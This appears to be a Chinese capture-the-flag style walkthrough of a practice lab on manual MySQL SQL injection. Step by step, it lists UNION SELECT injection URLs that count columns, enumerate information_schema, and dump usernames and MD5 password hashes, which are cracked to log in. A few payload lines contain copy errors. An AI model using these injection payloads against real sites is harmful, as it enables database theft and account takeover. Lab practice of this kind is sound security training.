SQL手工注入漏洞测试(MySQL数据库)

文章目录

题目信息:
背景介绍
安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MySQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧
实训目标
1.掌握SQL注入原理;
2.了解手工注入的方法;
3.了解MySQL的数据结构;
4.了解字符串的MD5加解密
解题方向
手工进行SQL注入测试,获取管理密码登录。

一、进入靶场

本题要求为SQL注入,那么我们就先去寻找注入点而不是直接**用户名和密码。
SQL手工注入漏洞测试(MySQL数据库)

二、在公告处发现注入点

SQL手工注入漏洞测试(MySQL数据库)

三、确定注入格式

  1. http://219.153.49.228:41317/new_list.php?id=1 and 1=1 >> 不报错,未过滤关键字
  2. http://219.153.49.228:41317/new_list.php?id=1 and 1=1 >> 报错,发现注入点

四、确定字段数

  1. http://219.153.49.228:41317/new_list.php?id=1order by 1 >> 不报错
  2. http://219.153.49.228:41317/new_list.php?id=1order by 2 >> 不报错
  3. http://219.153.49.228:41317/new_list.php?id=1order by 3 >> 不报错
  4. http://219.153.49.228:41317/new_list.php?id=1order by 4 >> 不报错
  5. http://219.153.49.228:41317/new_list.php?id=1order by 5 >> 报错

确定字段数为4

五、确定显示字段

  • http://219.153.49.228:41317/new_list.php?id=-1 union select 1,2,3,4
    SQL手工注入漏洞测试(MySQL数据库)
    确定显示字段为2和3。

六、查询数据库名字和版本

  • http://219.153.49.228:41317/new_list.php?id=-1 union select 1,database(),version(),4
    SQL手工注入漏洞测试(MySQL数据库)
    确定数据库名字为 mozhe_Discuz_StormGroup ,数据库版本为 5.7.22-0ubuntu0.16.04.1

七、查询其它数据库名称

  1. http://219.153.49.228:41317/new_list.php?id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 0,1 >> information_schema
  2. http://219.153.49.228:41317/new_list.php?id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1 >> mozhe_Discuz_StormGroup
  3. http://219.153.49.228:41317/new_list.php?id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 2,1 >> mysql
  4. http://219.153.49.228:41317/new_list.php?id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 3,1 >> performance_schema
  5. http://219.153.49.228:41317/new_list.php?id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 4,1 >> sys

八、查询数据库表名

  1. http://219.153.49.228:41317/new_list.php?id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup' limit 0,1>>StormGroup_member
  2. http://219.153.49.228:41317/new_list.php?id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup' limit 1,1>>notice
    根据表名我们可以发现,StormGroup_member这张表放的是用户信息,notice这张表中放的是公告信息

九、查询表中字段名

  1. http://219.153.49.228:41317/new_list.php?id=-1 union select 1,column_name,column_type,4 from information_schema.columns where table_name='StormGroup_member' limit 0,1>>id, int(11)
  2. http://219.153.49.228:41317/new_list.php?id=-1 union select 1,column_name,column_type,4 from information_schema.columns where table_name='StormGroup_member' limit 0,1>>name, varchar(20)
  3. http://219.153.49.228:41317/new_list.php?id=-1 union select 1,column_name,column_type,4 from information_schema.columns where table_name='StormGroup_member' limit 0,1>>password, varchar(255)
  4. http://219.153.49.228:41317/new_list.php?id=-1 union select 1,column_name,column_type,4 from information_schema.columns where table_name='StormGroup_member' limit 0,1>>status, int(11)

十、查询用户信息

  • http://219.153.49.228:41317/new_list.php?id=-1 union select 1,concat(name,'-',password,'-',status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1>>mozhe-356f589a7df439f6f744ff19bb8092c0-0
  • http://219.153.49.228:41317/new_list.php?id=-1 union select 1,concat(name,'-',password,'-',status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 1,1>>mozhe-e2391899875e16f7013173cd17524303-1
    查询出了两条记录,发现密码长度都为32位,猜测应该是md5加密的,将密码放进解密网站进行解密,使用用户名和密码登陆网站

十一、登陆成功

下方就是我们需要提交的key了SQL手工注入漏洞测试(MySQL数据库)

相关文章:

猜你喜欢
相关资源
相似解决方案
热门标签
Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode